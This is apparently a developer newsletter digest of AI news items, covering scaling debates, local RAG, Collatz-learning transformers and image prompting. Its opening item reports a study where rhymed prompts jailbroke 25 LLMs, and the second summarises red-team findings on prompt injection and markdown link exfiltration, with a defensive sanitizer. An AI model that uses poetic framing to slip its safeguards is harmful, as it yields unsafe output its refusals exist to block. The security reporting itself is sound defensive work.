🔗 Stories, Tutorials & Articles

Roses are red, violets are blue, if you phrase it as a poem, any jailbreak will do

A new study just broke the safety game wide open: rhymed prompts slipped past the filters of 25 major LLMs, including Gemini 2.5 Pro and DeepSeek, with up to 100% success. No clever chaining, no jailbreak soup. Just a single-shot rhyme.

Turns out, poetic language isn’t just for bard-core Twitter. When it comes to triggering unsafe outputs, especially around cyberattacks or data leaks, rhymes triple the success rate compared to plain prose.

Practical LLM Security Advice from the NVIDIA AI Red Team

NVIDIA’s AI Red Team nailed three security sinkholes in LLM-powered apps: reckless use of exec/eval, RAG pipelines that grab too much data, and markdown output that doesn’t get sanitized. These cracks open doors to remote code execution, sneaky prompt injection, and link-based data leaks.

The fix-it trend: app security’s leaning hard into sandboxed runtimes, tighter data permissions, and markdown rendering that can’t stab you.
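
For flavor, here’s what the markdown fix can look like in practice. A minimal sketch, not NVIDIA’s code: drop images outright and keep only links to trusted hosts before rendering model output, since auto-fetched image URLs are the classic exfiltration channel. The allowlist and regexes here are assumptions.

```python
import re
from urllib.parse import urlparse

# Hosts we trust for links in rendered LLM output (assumption for this sketch).
ALLOWED_HOSTS = {"docs.example.com", "github.com"}

IMAGE_MD = re.compile(r"!\[[^\]]*\]\([^)]*\)")    # ![alt](url)
LINK_MD = re.compile(r"\[([^\]]*)\]\(([^)]*)\)")  # [text](url)

def sanitize_markdown(text: str) -> str:
    """Strip images entirely; keep links only when the host is allowlisted.

    Images are the classic exfiltration channel: the renderer fetches the
    URL automatically, leaking whatever an injected prompt encoded into it.
    """
    text = IMAGE_MD.sub("", text)

    def check_link(match: re.Match) -> str:
        label, url = match.group(1), match.group(2)
        if urlparse(url).netloc.lower() in ALLOWED_HOSTS:
            return match.group(0)  # trusted link: keep as-is
        return label               # untrusted link: render the text only

    return LINK_MD.sub(check_link, text)

print(sanitize_markdown(
    "See ![x](https://evil.example/?d=SECRET) and [the docs](https://docs.example.com/a)"
))
```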

A trillion dollars is a terrible thing to waste

OpenAI co-founder Ilya Sutskever just said the quiet part out loud: scaling laws are breaking down. Bigger models aren’t getting better at thinking; they’re getting worse at generalizing and reasoning.

Now he’s eyeing neurosymbolic AI and innate inductive constraints. Yep, the “just make it huge” era might be over.

Google tests new Gemini 3 models on LM Arena

Google’s been quietly field-testing two shadow models, Fierce Falcon and Ghost Falcon, on LM Arena. Early signs? They’re probably warm-ups for the next Gemini 3 Flash or Pro drop. Classic Google move: float a checkpoint, stir up curiosity, then go GA.

Prompts for Open Problems

Ben Recht proposes five research directions inspired by his graduate machine learning class, arguing for different research rather than just more of it. The prompts include adopting a design-based view of decision theory, explaining the robust scaling trends in competitive testing, and moving beyond average-case evaluation. Crucially, he calls for optimization innovations that improve LLM reasoning efficiency, and he sees high-performing open-source, open-corpus language models that need minimal compute as the most vital applied problem.

200k Tokens Is Plenty

Amp’s team isn’t chasing token limits. Even with ~200k tokens available via Opus 4.5, they stick to short, modular threads of around 80k tokens each.

Why? Smaller threads are cheaper, more stable, and just work better. Instead of stuffing everything into a single mega-context, they slice big tasks into focused pieces. Cleaner scope, faster runs, fewer surprises.
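
The budgeting idea is simple enough to sketch. Here’s a hypothetical illustration, not Amp’s actual code: estimate the running token count and, once a thread nears its soft cap, hand off to a fresh one with a compact summary. The 4-characters-per-token heuristic and the function names are assumptions.

```python
THREAD_BUDGET = 80_000   # soft cap per thread, per the article
CHARS_PER_TOKEN = 4      # rough heuristic; swap in a real tokenizer

def estimate_tokens(messages: list[str]) -> int:
    """Cheap running estimate of a thread's token count."""
    return sum(len(m) for m in messages) // CHARS_PER_TOKEN

def should_split(messages: list[str]) -> bool:
    """True once the thread approaches its budget and deserves a fresh start."""
    return estimate_tokens(messages) >= THREAD_BUDGET

def start_fresh_thread(summary: str) -> list[str]:
    """Seed a new thread with a compact handoff, not the full history."""
    return [f"Context handoff from previous thread: {summary}"]
```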

Learning Collatz - The Mother of all Rabbit Holes

Researchers trained small transformer models to predict the “long Collatz step,” an arithmetic rule behind the infamous unsolved Collatz conjecture, and reached surprisingly high accuracy, up to 99.8%. The models did not learn the universal algorithm; instead they showed quantized learning, mastering specific input classes defined by their binary structure. Error analysis revealed that mistakes were systematic and explainable by simple rules, showing that transformers can learn complex arithmetic functions by latching onto special cases rather than hallucinating. The study also offers a new angle on AI interpretability: use the known mathematical structure of the problem to analyze what the model has learned.
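
For reference, the rule itself fits in a few lines. One common formulation of the “long step”, jumping from one odd number straight to the next odd number in the trajectory, looks like this (the paper’s exact definition may differ; this formulation is an assumption):

```python
def collatz_step(n: int) -> int:
    """One step of the classic Collatz rule."""
    return n // 2 if n % 2 == 0 else 3 * n + 1

def long_collatz_step(n: int) -> int:
    """From odd n, apply 3n + 1, then halve until odd again (odd-to-odd jump)."""
    assert n % 2 == 1, "the long step is defined on odd inputs"
    n = 3 * n + 1
    while n % 2 == 0:
        n //= 2
    return n

print(long_collatz_step(7))  # 7 -> 22 -> 11, prints 11
```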

So you wanna build a local RAG?

Skald spun up a full local RAG stack, with pgvector, Sentence Transformers, Docling, and llama.cpp, in under 10 minutes. The thing hums on English point queries. Benchmarks show open-source models and rerankers can go toe-to-toe with SaaS tools on most tasks. They stumble, though, on multilingual prompts and cross-doc mashups.
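
To make the shape of that stack concrete, here’s a minimal, hypothetical sketch of the retrieval half: embed the query with Sentence Transformers, then run a nearest-neighbor search against a pgvector table. The DSN, the model choice, and a pre-existing chunks(content text, embedding vector(384)) table are all assumptions.

```python
import psycopg2
from sentence_transformers import SentenceTransformer

# all-MiniLM-L6-v2 produces 384-dim embeddings; any ST model works similarly.
model = SentenceTransformer("all-MiniLM-L6-v2")

def retrieve(query: str, k: int = 5) -> list[str]:
    """Return the k stored chunks closest to the query by cosine distance."""
    emb = model.encode(query)
    literal = "[" + ",".join(str(x) for x in emb) + "]"  # pgvector literal
    with psycopg2.connect("dbname=rag user=rag") as conn:  # assumed DSN
        with conn.cursor() as cur:
            # pgvector's <=> operator is cosine distance.
            cur.execute(
                "SELECT content FROM chunks ORDER BY embedding <=> %s::vector LIMIT %s",
                (literal, k),
            )
            return [row[0] for row in cur.fetchall()]

for chunk in retrieve("how do I rotate an API key?"):
    print(chunk[:80])
```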

How to Create an Effective Prompt for Nano Banana Pro

The author details how to effectively prompt Google’s Nano Banana Pro, a visual reasoning model, arguing that success depends on structured design documents rather than vague requests. The method follows four steps: define the Work Surface (e.g., dashboard or comic), specify the precise Layout, list all required Components, and enforce strict Constraints to keep output consistent. This approach plays to the model’s distinct engines (Layout, Typography, Style) to create complex, structurally coherent visual artifacts, demonstrated through an ambitious comic-book adaptation project.
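
As a hypothetical illustration (the four field names follow the article; the builder function and example wording are mine), such a design document can be assembled like this:

```python
def build_prompt(surface: str, layout: str,
                 components: list[str], constraints: list[str]) -> str:
    """Assemble the four-part design document as a single prompt string."""
    return "\n".join([
        f"Work Surface: {surface}",
        f"Layout: {layout}",
        "Components:",
        *[f"- {c}" for c in components],
        "Constraints:",
        *[f"- {c}" for c in constraints],
    ])

print(build_prompt(
    surface="single comic book page, portrait",
    layout="3x2 panel grid, gutters at 5% of page width",
    components=["panel 1: establishing shot of the city",
                "panel 2: close-up of the hero"],
    constraints=["consistent character design across panels",
                 "flat colors, no gradients"],
))
```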
👉 Got something to share? Create your FAUN Page and start publishing your blog posts, tools, and updates. Grow your audience, and get discovered by the developer community. |